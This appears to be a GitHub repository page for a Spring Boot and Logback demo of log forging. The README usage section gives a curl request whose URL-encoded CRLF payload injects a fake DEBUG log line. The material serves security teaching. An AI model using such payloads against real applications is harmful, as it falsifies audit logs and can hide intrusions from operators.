Skip to content
/ log-injection-spring-boot-logback Public

This application is a demonstration prototype just to show how to perform Log Forging attack.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdbe-appsec/log-injection-spring-boot-logback

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
gradle/wrapper
gradle/wrapper
 
 
src
src
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
build.gradle
build.gradle
 
 
gradlew
gradlew
 
 
gradlew.bat
gradlew.bat
 
 
settings.gradle
settings.gradle
 
 

Repository files navigation

Log Injection with Spring Boot and Logback

  • Run
./gradlew bootRun
  • Usage
curl http://localhost:8080/\?name\=Frodon

curl http://localhost:8080/\?name\=Marty%0d%0a1985-10-30%2021%3A59%3A01.108%20DEBUG%20128537%20---%20%5Bnio-8080-exec-1%5D%20net.example.logging.HelloController%20%20%20%20%20%20%3A%20You%20have%20been%20pwed%0A
  • Fix it

About

This application is a demonstration prototype just to show how to perform Log Forging attack.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages